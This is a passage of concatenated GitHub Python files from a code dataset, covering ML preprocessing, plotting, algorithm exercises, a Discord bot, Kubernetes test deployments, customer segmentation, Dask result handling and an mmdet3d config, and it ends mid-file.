(all_input_ids4,all_input_mask4,all_segment_ids4,all_label_ids4)\n \n return inputs1,inputs2,inputs3,inputs4\n\ndef get_inputs(mode=\"train\"):\n root_path = \"../data/\"\n json_file = f\"{mode}_questions.json\"\n \n json_data = read_json(root_path+json_file)\n ctx1 = pickle.load(open(root_path+f\"{mode}_ctx_ids-top10.pkl\",\"rb\"))\n ctx2 = pickle.load(open(root_path+f\"{mode}_ctx_ids-top10_ignore-answers.pkl\",\"rb\"))\n ctx3 = pickle.load(open(root_path+f\"{mode}_ctx_ids-top10_query-add-answers.pkl\",\"rb\"))\n \n \n for data,c1,c2,c3 in zip(json_data,ctx1,ctx2,ctx3):\n data[\"ctx1\"] = c2\n data[\"ctx2\"] = c1\n data[\"ctx3\"] = c3\n \n processor = JaqketProcessor()\n examples = processor.get_examples(\"dev\",root_path,json_data,entities)\n values = [(ex.contexts,ex.endings,ex.question,ex.label,ex.example_id,ex.ctx1,ex.ctx2,ex.ctx3) for ex in examples]\n with Pool(multiprocessing.cpu_count()) as p:\n features = list(tqdm(p.imap(convert_examples_to_features,values), total=len(values)))\n features = [f[0] for f in features]\n \n \n batch1,batch2,batch3,batch4 = get_batch(features)\n \n torch.save({f\"{mode}_input_ids\":batch1[0],\n f\"{mode}_input_mask\":batch1[1],\n f\"{mode}_segment_ids\":batch1[2],\n f\"{mode}_label_ids\":batch1[3]},root_path+f\"basev2-{mode}_features-seq768-sorted_title-bm25_search-search_ver3.pt\")\n \n torch.save({f\"{mode}_input_ids\":batch2[0],\n f\"{mode}_input_mask\":batch2[1],\n f\"{mode}_segment_ids\":batch2[2],\n f\"{mode}_label_ids\":batch2[3]},root_path+f\"basev2-{mode}_features-seq768-title_only-search_ver3.pt\")\n \n torch.save({f\"{mode}_input_ids\":batch3[0],\n f\"{mode}_input_mask\":batch3[1],\n f\"{mode}_segment_ids\":batch3[2],\n f\"{mode}_label_ids\":batch3[3]},root_path+f\"basev2-{mode}_features-seq768-question_only-search_ver3.pt\")\n \n torch.save({f\"{mode}_input_ids\":batch4[0],\n f\"{mode}_input_mask\":batch4[1],\n f\"{mode}_segment_ids\":batch4[2],\n f\"{mode}_label_ids\":batch4[3]},root_path+f\"basev2-{mode}_features-seq768-question_only-add_answer-search_ver3.pt\")\n \n \n return features\n\n\nif __name__ == \"__main__\":\n \n with open('../ir_dump/doc_id2title.pickle', 'rb') as f:\n doc_id2title = pickle.load(f)\n\n input_file = '../data/all_entities.json.gz'\n entitie2id = {k:v for v,k in enumerate(doc_id2title)}\n with gzip.open(input_file, \"rt\", encoding=\"utf-8\") as fin:\n lines = fin.readlines()\n\n entities = dict()\n for line in lines:\n entity = json.loads(line.strip())\n entities[entity[\"title\"]] = entity[\"text\"]\n del lines \n \n path_name = \"cl-tohoku/bert-base-japanese-v2\"\n tokenizer = BertJapaneseTokenizer.from_pretrained(path_name)\n\n features = get_inputs(mode=\"train\")\n features = get_inputs(mode=\"dev1\")\n features = get_inputs(mode=\"dev2\")","repo_name":"syuuuuukun/aio-solution","sub_path":"preprocess/make_inputs.py","file_name":"make_inputs.py","file_ext":"py","file_size_in_byte":24203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"33470693466","text":"from scipy.io import loadmat\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom read_capture_data import *\n\ndef main():\n\tdata = loadmat('readable_capture_data.mat');\n\n\tnormal = read_capture_data(data['normal_data']);\n\tinsuf_depth = read_capture_data(data['insuf_depth_data']);\n\n\tn_samples = 1000\n\ts = np.linspace(0, 1, n_samples)\n\n\n\tnormal_start = 435\n\tnormal_end = 726\n\tnormal_s_map = np.linspace(normal_start, normal_end, n_samples).astype(int)\n\n\tinsuf_depth_start 
= 133\n\tinsuf_depth_end = 345\n\tinsuf_depth_s_map = np.linspace(insuf_depth_start, insuf_depth_end, n_samples).astype(int)\n\n\thip_height_idx = 2\n\tplt.subplot(121)\n\tplt.plot(s, normal.position[normal_s_map, hip_height_idx])\n\tplt.plot(s, insuf_depth.position[insuf_depth_s_map, hip_height_idx])\n\tplt.xlabel(\"Squat Path Variable, S (unitless)\")\n\tplt.ylabel(\"Hip Height (m)\")\n\tplt.legend([\"Baseline\",\"Insufficient Depth\"])\n\tplt.title(\"Normal Vs Insufficient Depth Hip Height\")\n\n\tplt.subplot(122)\n\n\tr_hip_idx = 14\n\tr_knee_idx = 15\n\tr_ankle_idx = 16\n\tl_hip_idx = 18\n\tl_knee_idx = 19\n\tl_ankle_idx = 20\n\n\tangle_diff = normal.joint_angles[normal_s_map,:]-insuf_depth.joint_angles[insuf_depth_s_map,:]\n\n\tplt.plot(s, angle_diff[:, 3*r_hip_idx+2],'r')\n\tplt.plot(s, angle_diff[:, 3*r_knee_idx+2],'g')\n\tplt.plot(s, angle_diff[:, 3*r_ankle_idx+2],'b')\n\tplt.plot(s, angle_diff[:, 3*l_hip_idx+2],'m')\n\tplt.plot(s, angle_diff[:, 3*l_knee_idx+2],'y')\n\tplt.plot(s, angle_diff[:, 3*l_ankle_idx+2],'c')\n\tplt.xlabel(\"Squat Path Variable, S (unitless)\")\n\tplt.ylabel(\"Joint Angle Error (deg)\")\n\tplt.legend([\"Right Hip\",\"Right Knee\",\"Right Ankle\",\"Left Hip\",\"Left Knee\",\"Left Ankle\"])\n\tplt.title(\"Error (Difference in Joint Angles)\");\n\n\tplt.show()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"RowanFerrabee/IMU_State_Estimation","sub_path":"moven_capture_data/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"32737517691","text":"def solve_n_queens(n):\r\n board = [['.' for _ in range(n)] for _ in range(n)]\r\n solutions = []\r\n\r\n def is_safe(row, col):\r\n # Check if no queens threaten the current position\r\n for i in range(row):\r\n if board[i][col] == 'Q':\r\n return False\r\n j = row - i\r\n if col - j >= 0 and board[i][col - j] == 'Q':\r\n return False\r\n if col + j < n and board[i][col + j] == 'Q':\r\n return False\r\n return True\r\n\r\n def backtrack(row):\r\n # Base case: All rows have been filled, add the solution\r\n if row == n:\r\n solutions.append([''.join(row) for row in board])\r\n return\r\n\r\n # Try placing a queen in each column of the current row\r\n for col in range(n):\r\n if is_safe(row, col):\r\n board[row][col] = 'Q'\r\n backtrack(row + 1)\r\n board[row][col] = '.'\r\n\r\n backtrack(0)\r\n return solutions\r\n\r\n# Test the implementation\r\nn = 4\r\nsolutions = solve_n_queens(n)\r\nprint(f\"Number of solutions for {n}-Queens problem: {len(solutions)}\")\r\nfor i, solution in enumerate(solutions):\r\n print(f\"Solution {i+1}:\")\r\n for row in solution:\r\n print(row)\r\n print()\r\n ","repo_name":"nehaaero/DS300123","sub_path":"Assignment-4-Q-1-1-DSA-advance.py","file_name":"Assignment-4-Q-1-1-DSA-advance.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32352479294","text":"import face_test2 as t\n\n\ndef test3prec(nb_files):\n str1 = 'v3model'\n str2 = '.npz'\n print(\"Starting test differents modeles (t)\")\n num_mod = 0\n res3pres = []\n\n for i in range(nb_files):\n res3pres.append(t.launchTests(str1+str(i*50)+str2, t.dbs, t.dbd, threshold = 1.19))\n print(\"model tested :\"+str1+str(i*50)+str2)\n print('Liste des 3 precisions en faisant varier le modele:')\n print(res3pres)\n return(res3pres)\n\n\ndef testseuilVariable(mini,maxi,model, nb):\n print(\"Starting test 
seuilvariable\")\n seuil = list(mini+i*(maxi-mini)/float(nb) for i in range(nb))\n res3pres1 = list()\n res3pres2 = list()\n res3pres3 = list()\n for i in range(nb):\n res3pres1.append(t.launchTests(model, t.dbs, t.dbd, threshold = seuil[i])[0])\n res3pres2.append(t.launchTests(model, t.dbs, t.dbd, threshold = seuil[i])[1])\n res3pres3.append(t.launchTests(model, t.dbs, t.dbd, threshold = seuil[i])[2])\n print(\"Seuil teste : \"+str(seuil[i]))\n print(\"Liste des 3 precisions pour le seuil qui varie:\")\n print(res3pres)\n return((res3pres1, res3pres2, res3pres3))\n\n\n\n#presOvertime = test3prec(18)\n#presOverSeuil = testseuilVariable(0,2, 'v3model950.npz',20)\n\n#presOverSeuilZoom = testseuilVariable(0.9,1.3, 'v3model950.npz',16)\n","repo_name":"RaphaelGraille/FaceVerification","sub_path":"test3precision.py","file_name":"test3precision.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"42345648935","text":"import discord\nfrom discord.ext import commands\nimport unicodedata\n\nuser = None\nmsgr = None\n\nclass helpCog(commands.Cog, name=\"help\"):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def help(self, ctx):\n author = ctx.message.author\n helpmessage =[]\n helpmessage.append(\"```md\")\n\n helpmessage.append(\"# How to use ellec-bot\")\n helpmessage.append(\"\\n\")\n animerole = discord.utils.get(ctx.guild.roles, name=\"anime\")\n if animerole in author.roles:\n helpmessage.append(\"< Anime Functions >\")\n helpmessage.append(\"<anime functions only for 'anime' role and in #eye-cartons>\")\n helpmessage.append(\"rebuild - rebuild the anime cache, use this if stuff doesnt work\")\n helpmessage.append(\"anime - list of anime we're watching this season\")\n helpmessage.append(\"s + *search* - searches nyaa.si with *search*\")\n helpmessage.append(\"chen *- anime for that day with links\")\n helpmessage.append(\" * defaults today\"\n \" * yesterday\"\n \" * day (eg. 
Friday)\")\n helpmessage.append(\"\\n\")\n\n helpmessage.append('< Admin Functions >')\n helpmessage.append('banlist - list of banned words/phrases')\n helpmessage.append('status - list of current function statuses')\n \n if ctx.guild.get_member(author.id).guild_permissions.manage_messages:\n helpmessage.append('pit - toggles pit function')\n helpmessage.append('unpit - toggles an unpit function')\n helpmessage.append('timer * - change the time on unpit after the next unpit')\n helpmessage.append('banadd * - add a term to the banlist')\n helpmessage.append('banremove * - removes a term from the banlist')\n helpmessage.append(\"```\")\n mess = '\\n'.join(helpmessage)\n await author.send(mess)\n\n @commands.command()\n async def print(self, ctx, arg):\n print(arg)\n\n @commands.command()\n async def permcheck(self, ctx):\n id = ctx.author.id\n member = ctx.guild.get_member(id)\n if member.guild_permissions.manage_messages:\n print(\"IS A MOD\")\n\n @commands.command()\n @commands.has_permissions(manage_roles=True)\n async def charinfo(self, ctx, *, characters: str):\n\n def to_string(c):\n digit = f'{ord(c):x}'\n name = unicodedata.name(c, 'Name not found.')\n return f'`\\\\U{digit:>08}`: {name} - {c} \\N{EM DASH} <http://www.fileformat.info/info/unicode/char/{digit}>'\n msg = '\\n'.join(map(to_string, characters))\n if len(msg) > 2000:\n return await ctx.send('Output too long to display.')\n await ctx.send(msg)\n\ndef setup(bot):\n bot.add_cog(helpCog(bot))\n print('help cog loaded')","repo_name":"hamracer/ullecbot","sub_path":"cogs/old/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17344433932","text":"import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef load_dataset(image:str):\n\timg=plt.imread(image)\n\n\t#let's just get rid of the A value, since we don't need that\n\timg=img[:,:,:3]\n\treturn img\n\n#Calculate the cumulative loss\ndef calculate_distortion(r, mu, x):\n\tN=len(x)\n\tK=len(mu)\n\n\tJ=0\n\n\tfor n in range(N):\n\t\tfor k in range(K):\n\t\t\tif r[n]==k:\n\t\t\t\tJ+=np.square(np.linalg.norm(x[n]-mu[k]))\n\treturn J\n\n#Randomly initialize the centers\ndef initialize_mu(X, k):\n\tmu_list=random.sample(list(X),k)\n\treturn mu_list\n\n#Compute the difference between two spots\ndef euclidean_distance(x,y):\n\ttotal=0\n\tfor i in range(len(x)):\n\t\ttotal+=np.square(x[i]-y[i])\n\treturn np.sqrt(total)\n\n#Update which center the points are assigned to by computing the euclidean distance\ndef update_r(X, mu):\n\tr=np.zeros(len(X))\n\tfor i in range(len(X)):\n\t\tmin_dist=9999\n\t\tclosest_center=None\n\t\tfor k in range(len(mu)):\n\t\t\tk_dist=euclidean_distance(X[i],mu[k])\n\t\t\tif k_dist<min_dist:\n\t\t\t\tmin_dist=k_dist\n\t\t\t\tclosest_center=k\n\t\tr[i]=closest_center\n\treturn r\n\n\n#Update the mean values by taking the average of the points assigned to that class\ndef update_mu(X, r, k):\n\tmu=np.zeros((k,3))\n\tfor i in range(k):\n\t\tc=np.zeros(3)\n\t\tclass_count=0\n\t\tfor n in range(len(X)):\n\t\t\t#Sum over the points assigned to that class\n\t\t\tif(r[n]==i):\n\t\t\t\tc=c+X[n]\n\t\t\t\tclass_count+=1\n\t\t#Preventing divide by zero\n\t\tif class_count==0:\n\t\t\tclass_count=1\n\t\t#Divide by the number of points assigned to that class to get the average\n\t\tc/=class_count\n\t\tmu[i]=c\n\treturn mu\n\n\n#Run the k-means algorithm over an image and print the loss over iterations\ndef 
kmeans(image:str):\n\timg=load_dataset(image)\n\trows=img.shape[0]\n\tcols=img.shape[1]\n\tX=np.reshape(img, (img.shape[0]*img.shape[1], img.shape[2]))\n\n\n\tmax_iterations=100000000000000\n\tk_list=[3,5,7]\n\tfor k in k_list:\n\t\tloss=[]\n\t\tcenters=initialize_mu(X,k)\n\t\tloss_threshold=0.001\n\t\tfor i in range(max_iterations):\n\t\t\tr=update_r(X, centers)\n\t\t\tj=calculate_distortion(r,centers,X)\n\t\t\tcenters=update_mu(X, r, k)\n\t\t\tprint(\"For iteration:%s, number of centers:%s, the distortion measure is %s\" % (i,k,j))\n\t\t\tloss.append(j)\n\t\t\tif(len(loss)>1):\n\t\t\t\tif(abs(loss[i]-loss[i-1])<loss_threshold):\n\t\t\t\t\tbreak\n\n\t\t#Save the compressed image\t\t\t\n\t\tfinal_r=update_r(X, centers)\n\t\trecovered=centers[final_r.astype(int)]\n\t\trecovered=np.reshape(recovered, (rows, cols, 3))\n\t\tplt.imsave('q3_compressed_image_'+str(k)+'.png',recovered)\n\n\t\t#Plot the cumulative loss over the iterations for this particular number of prototypes\n\t\tfig=plt.figure()\n\t\tfig_axes=fig.add_axes([0.1,0.1,0.8,0.8])\n\t\tfig_axes.plot(loss)\n\t\tfig_axes.set_xlabel('Number of Iterations')\n\t\tfig_axes.set_ylabel('Cumulative Loss')\n\t\tfig_axes.set_title('Loss Over Iterations For '+ str(k)+' Prototypes')\n\t\tfig.savefig('q3_k'+str(k))\n\n\nif __name__ == '__main__':\n\tkmeans('umn_csci.png')","repo_name":"emulhall/CSCI5525-Machine-Learning","sub_path":"Hw4/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39726390628","text":"from kubernetes.client import (\n V1Container,\n V1ContainerPort,\n V1Deployment,\n V1DeploymentSpec,\n V1EnvVar,\n V1LabelSelector,\n V1ObjectMeta,\n V1PodSpec,\n V1PodTemplateSpec,\n V1Service,\n V1ServicePort,\n V1ServiceSpec,\n)\n\nfrom materialize.cloudtest import DEFAULT_K8S_NAMESPACE\nfrom materialize.cloudtest.k8s.api.k8s_deployment import K8sDeployment\nfrom materialize.cloudtest.k8s.api.k8s_resource import K8sResource\nfrom materialize.cloudtest.k8s.api.k8s_service import K8sService\n\n\nclass SshDeployment(K8sDeployment):\n def __init__(self, namespace: str) -> None:\n super().__init__(namespace)\n env = [\n V1EnvVar(name=\"SSH_USERS\", value=\"mz:1000:1000\"),\n V1EnvVar(name=\"TCP_FORWARDING\", value=\"true\"),\n ]\n ports = [V1ContainerPort(container_port=22, name=\"ssh\")]\n container = V1Container(\n name=\"ssh-bastion-host\",\n image=\"panubo/sshd:1.5.0\",\n env=env,\n ports=ports,\n )\n\n template = V1PodTemplateSpec(\n metadata=V1ObjectMeta(labels={\"app\": \"ssh-bastion-host\"}),\n spec=V1PodSpec(containers=[container]),\n )\n\n selector = V1LabelSelector(match_labels={\"app\": \"ssh-bastion-host\"})\n\n spec = V1DeploymentSpec(replicas=1, template=template, selector=selector)\n\n self.deployment = V1Deployment(\n api_version=\"apps/v1\",\n kind=\"Deployment\",\n metadata=V1ObjectMeta(name=\"ssh-bastion-host\"),\n spec=spec,\n )\n\n\nclass SshService(K8sService):\n def __init__(self, namespace: str) -> None:\n super().__init__(namespace)\n ports = [\n V1ServicePort(name=\"ssh\", port=22),\n ]\n\n self.service = V1Service(\n metadata=V1ObjectMeta(\n name=\"ssh-bastion-host\", labels={\"app\": \"ssh-bastion-host\"}\n ),\n spec=V1ServiceSpec(\n type=\"NodePort\", ports=ports, selector={\"app\": \"ssh-bastion-host\"}\n ),\n )\n\n\ndef ssh_resources(namespace: str = DEFAULT_K8S_NAMESPACE) -> list[K8sResource]:\n return [SshDeployment(namespace), 
SshService(namespace)]\n","repo_name":"MaterializeInc/materialize","sub_path":"misc/python/materialize/cloudtest/k8s/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":5389,"dataset":"github-code","pt":"95"} +{"seq_id":"13257161848","text":"import random\n\n\ndef get_random(floor, ceiling):\n return random.randint(floor, ceiling)\n\n\ndef naive_shuffle(the_list):\n # For each index in the list\n for first_index in range(0, len(the_list)):\n # Grab a random other index\n second_index = get_random(first_index, len(the_list) - 1)\n # And swap the values\n if second_index != first_index:\n the_list[first_index], the_list[second_index] = \\\n the_list[second_index], the_list[first_index]\n\n return the_list\n\n\nprint(naive_shuffle([1,2,3]))\n\n\n","repo_name":"dhruvarora93/Algorithm-Questions","sub_path":"Array Problems/shuffle_list.py","file_name":"shuffle_list.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"24630293469","text":"import turtle\nimport time\n\nt = turtle.Turtle()\nt.speed('fastest')\nt.hideturtle()\nt.penup()\nt.goto(180, 0)\nt.pendown()\n\n# SETTINGS #\nbase = 100\ntotal = 130\nside = total - base\nangle = 15\n\n# Dont show turtle movements until done\nturtle.tracer(0, 0)\n\nloop = True\nwhile loop:\n\tt.fd(base)\n\tt.left(180)\n\tt.right(angle)\n\tt.fd(side)\n\tt.goto(180, 0)\n\tt.seth(0)\n\tprint(\"angle: \" + str(angle))\n\tbase -= 5\n\tside = total - base\n\tangle += 5\n\n\tif angle >= 900:\n\t\tloop = False\n\n# Display all new lines\nturtle.update()\n# turtle.done()\n\ninput(\"Press a button\")\n## SAVE\nts = turtle.getscreen()\nts.getcanvas().postscript(file=\"script_output.eps\")","repo_name":"eebmagic/python_turtle_art","sub_path":"sliding_triangles/slidingTriangles.py","file_name":"slidingTriangles.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"12250270567","text":"# coding: utf-8\n# ---------------------------------------------------------------------------------\n# RFM data collection\n# + Recency - amount of time since the customer’s most recent transaction [days_since_last_nonclub_order]\n# + Frequency - total number of transactions made by the customer (during a defined period) [total_orders]\n# + Monetary - total amount that the customer has spent across all transactions (during a defined period) [lifetime_value]\n# ---------------------------------------------------------------------------------\n# K-mean clustering\n# Divide the customer list into tiered groups with more homogeneous characteristics for each of the three dimensions (R, F and M) via K-mean clustering method.\n# Related link - http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html\n\n\n# Load global libs\nimport pandas as pd\nimport os, time, sys\nimport psycopg2\nfrom datetime import date, timedelta, datetime as DT\nfrom sklearn.cluster import KMeans\n\n# Time zone setup\nos.environ['TZ'] = 'US/Pacific'\ntime.tzset()\n\n\n# Utility functions and main\ndef _tstamp():\n \"\"\"\n formatted time stamp\n \"\"\"\n ts = time.time()\n # time.strftime('%X %x %Z')\n return '[{:s}]'.format(DT.fromtimestamp(ts).strftime('%m-%d %H:%M:%S'))\n\ndef get_order_data_from_db(qry_str):\n \"\"\"\n extract data via sql query\n \"\"\"\n conn = psycopg2.connect(dbname='matrix',\n host='xxxxxxxx',\n 
port='xxxxxxxx', user='xxxxxxxx', password='xxxxxxxx')\n df3 = pd.read_sql_query(qry_str, conn)\n conn.close()\n return df3\n\ndef main():\n qry_customer_RFM = '''\n SELECT\n \tcustomer_id,\n \tCOALESCE(days_since_last_nonclub_order,0) AS recency,\n \ttotal_orders AS frequency,\n \tlifetime_value AS monetary\n FROM\n \tcustomer_order\n WHERE lifetime_value >0 AND first_order_date >= '2009-04-13 21:06:20'\n AND first_order_date < current_date --limit 10000\n '''\n\n # Load customer RFM data into dataframe\n #df_cust_RFM = pd.read_csv('customer_RFM1.csv', delimiter=',')\n df_cust_RFM = get_order_data_from_db(qry_customer_RFM)\n\n\n # Normalize RFM value and assign tiers for each dimension\n l_attrs = ['recency','frequency','monetary']\n l_attrs_ln = [attr+'_ln' for attr in l_attrs]\n df_cust_RFM_norm = df_cust_RFM.copy()\n\n print('Normalize ln(x)...')\n for idx, attr in enumerate(l_attrs):\n attr_ln = l_attrs_ln[idx]\n df_cust_RFM_norm[attr_ln] = pd.np.log(df_cust_RFM_norm[attr]+1)\n val_min, val_max = df_cust_RFM_norm[attr_ln].min(), df_cust_RFM_norm[attr_ln].max()\n val_scal = val_max - val_min\n print(attr_ln, end=':\\t')\n print(['{:.2f}'.format(val) for val in (val_min, val_max, val_scal)]) # Debug print\n df_cust_RFM_norm[attr] = df_cust_RFM_norm[attr_ln].apply(lambda x: (x - val_min) / val_scal)\n if attr[0] == 'r':\n df_cust_RFM[attr[0]+'_tier'] = df_cust_RFM_norm[attr].map(lambda nv: 'T{}'.format(int(nv*99.99//25)+1))\n else:\n df_cust_RFM[attr[0]+'_tier'] = df_cust_RFM_norm[attr].map(lambda nv: 'T{}'.format(4-int(nv*99.99//25)))\n\n # Perform K-mean clustering\n # Related link - http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html\n n_center = 64 # 4x4x4 RFM matrix\n est_km = KMeans(n_clusters= n_center, random_state=666, n_jobs= -3)\n print('# of center to cluster: {}'.format(n_center), flush=True)\n print(_tstamp()+' Start K-mean clustering...', flush=True) # Debug print\n tstart = time.time()\n est_km.fit(df_cust_RFM_norm[l_attrs])\n tfinish = time.time()\n print(_tstamp()+' Done! ({:.1f} sec)'.format(tfinish-tstart), flush=True) # Debug print\n\n # Assign cluster group\n df_cust_RFM['cgroup'] = est_km.labels_+1\n df_cust_RMF_centers = pd.DataFrame(est_km.cluster_centers_, columns=l_attrs)\n df_cust_RMF_centers.head()\n\n df_cust_RMF_centers.sort_values('monetary', ascending=False)\n df_cust_RFM.sort_values('customer_id', inplace=True)\n\n # Output to csv\n csv_file = 'customer_RFM_tiers.csv'\n df_cust_RFM.to_csv(csv_file, index=False)\n print (df_cust_RFM)\n print('Saved to csv: ' + csv_file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jerry-s-cheng/RFM","sub_path":"build_RFM_segmentation.py","file_name":"build_RFM_segmentation.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"74903484791","text":"from django.urls import path\n# from dajaxice.core import dajaxice_autodiscover, dajaxice_config\n# from django.contrib.staticfiles.urls import staticfiles_urlpatterns\n# from django.conf import settings\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('link', views.linkScrap, name='linkScrap'),\n path('info', views.infoScrap, name='infoScrap'),\n path('result', views.handle, name='handle')\n]\n","repo_name":"LOMFM/Py-Scrapping","sub_path":"scrapping/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8106895841","text":"\"\"\"\nInfrastructure for retrieving and logging intermediate results from pytorch training jobs.\n\nCurrently using dask pub/sub, but will create an S3 version in the future.\n\"\"\"\nimport uuid\nimport logging\nimport os\nfrom typing import List, Optional\nfrom os.path import join, exists, dirname\n\nfrom distributed.pubsub import Pub, Sub\nfrom distributed.utils import TimeoutError as DistributedTimeoutError\nfrom distributed.client import wait, FIRST_COMPLETED, Future\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass DaskResultsHandler:\n \"\"\"\n This class use Dask pubsub infra to pass intermediate results back from PyTorch\n jobs to the client.\n \"\"\"\n\n def __init__(self, pub_sub_key: Optional[str] = None):\n \"\"\"\n pub_sub_key is an arbitrary string (topic) for the pub sub channel.\n It's a good idea to change it. Sometimes old topics can get \"clogged\"\n \"\"\"\n if pub_sub_key is None:\n pub_sub_key = uuid.uuid4().hex\n self.pub_sub_key = pub_sub_key\n\n @classmethod\n def _get_all(cls, sub: Sub):\n while True:\n try:\n yield sub.get(timeout=1.0)\n except DistributedTimeoutError:\n break\n\n def _get_results(self, futures: List[Future], raise_errors: bool = True):\n sub = Sub(self.pub_sub_key)\n while True:\n for obj in self._get_all(sub):\n yield obj\n if not futures:\n break\n try:\n result = wait(futures, 0.1, FIRST_COMPLETED)\n except DistributedTimeoutError:\n continue\n\n for fut in result.done:\n try:\n fut.result()\n except Exception as e: # pylint: disable=broad-except\n logging.exception(e)\n if raise_errors:\n raise\n futures = result.not_done\n\n def process_results(\n self, prefix: str, futures: List[Future], raise_errors: bool = True\n ) -> None:\n \"\"\"\n Process the intermediate results:\n result objects will be dictionaries of the form {'path': path, 'data': data}\n As results come in, data will be written to f\"prefix/{path}\"\n\n prefix: directory where you want results to be written\n futures: list of futures for your jobs (output of dask_pytorch_ddp.dispatch.run)\n raise_errors: If any of the jobs fail, either raise an exception, or log it and continue.\n \"\"\"\n for result in self._get_results(futures, raise_errors=raise_errors):\n path = result[\"path\"]\n data = result[\"data\"]\n fpath = join(prefix, path)\n if not exists(dirname(fpath)):\n os.makedirs(dirname(fpath))\n if isinstance(data, str):\n data = data.encode(\"utf-8\")\n with open(fpath, \"wb+\") as f:\n f.write(data)\n\n def submit_result(self, path: str, data: str):\n \"\"\"\n To be used in jobs. 
Call this function with a path, and some data.\n Client will write {data} to a file at {path}\n \"\"\"\n pub = Pub(self.pub_sub_key)\n pub.put({\"path\": path, \"data\": data})\n","repo_name":"saturncloud/dask-pytorch-ddp","sub_path":"dask_pytorch_ddp/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"95"} +{"seq_id":"19715388979","text":"from mmengine import read_base\n\nwith read_base():\n from .._base_.schedules.cosine import *\n from .._base_.default_runtime import *\n\nfrom mmcv.transforms.loading import LoadImageFromFile\nfrom mmcv.transforms.processing import RandomResize, Resize\nfrom mmengine.dataset.dataset_wrapper import RepeatDataset\nfrom mmengine.dataset.sampler import DefaultSampler\nfrom mmengine.visualization.vis_backend import LocalVisBackend\n\nfrom mmdet3d.datasets.kitti_dataset import KittiDataset\nfrom mmdet3d.datasets.transforms.formating import Pack3DDetInputs\nfrom mmdet3d.datasets.transforms.loading import (LoadAnnotations3D,\n LoadPointsFromFile)\nfrom mmdet3d.datasets.transforms.test_time_aug import MultiScaleFlipAug3D\nfrom mmdet3d.datasets.transforms.transforms_3d import (GlobalRotScaleTrans,\n ObjectRangeFilter,\n PointShuffle,\n PointsRangeFilter,\n RandomFlip3D)\nfrom mmdet3d.evaluation.metrics.kitti_metric import KittiMetric\nfrom mmdet3d.models.backbones.second import SECOND\nfrom mmdet3d.models.data_preprocessors.data_preprocessor import \\\n Det3DDataPreprocessor\nfrom mmdet3d.models.dense_heads.anchor3d_head import Anchor3DHead\nfrom mmdet3d.models.detectors.mvx_faster_rcnn import DynamicMVXFasterRCNN\nfrom mmdet3d.models.layers.fusion_layers.point_fusion import PointFusion\nfrom mmdet3d.models.middle_encoders.sparse_encoder import SparseEncoder\nfrom mmdet3d.models.necks.second_fpn import SECONDFPN\nfrom mmdet3d.models.task_modules.anchor.anchor_3d_generator import \\\n Anchor3DRangeGenerator\nfrom mmdet3d.models.task_modules.assigners.max_3d_iou_assigner import \\\n Max3DIoUAssigner\nfrom mmdet3d.models.task_modules.coders.delta_xyzwhlr_bbox_coder import \\\n DeltaXYZWLHRBBoxCoder\nfrom mmdet3d.models.voxel_encoders.voxel_encoder import DynamicVFE\nfrom mmdet3d.structures.ops.iou3d_calculator import BboxOverlapsNearest3D\nfrom mmdet3d.visualization.local_visualizer import Det3DLocalVisualizer\n\n# model settings\nvoxel_size = [0.05, 0.05, 0.1]\npoint_cloud_range = [0, -40, -3, 70.4, 40, 1]\n\nmodel = dict(\n type=DynamicMVXFasterRCNN,\n data_preprocessor=dict(\n type=Det3DDataPreprocessor,\n voxel=True,\n voxel_type='dynamic',\n voxel_layer=dict(\n max_num_points=-1,\n point_cloud_range=point_cloud_range,\n voxel_size=voxel_size,\n max_voxels=(-1, -1)),\n mean=[102.9801, 115.9465, 122.7717],\n std=[1.0, 1.0, 1.0],\n bgr_to_rgb=False,\n pad_size_divisor=32),\n img_backbone=dict(\n type='mmdet.ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n norm_cfg=dict(type='BN', requires_grad=False),\n norm_eval=True,\n style='caffe'),\n img_neck=dict(\n type='mmdet.FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n # make the image features more stable numerically to avoid loss nan\n norm_cfg=dict(type='BN', requires_grad=False),\n num_outs=5),\n pts_voxel_encoder=dict(\n type=DynamicVFE,\n in_channels=4,\n feat_channels=[64, 64],\n with_distance=False,\n voxel_size=voxel_size,\n with_cluster_center=True,\n 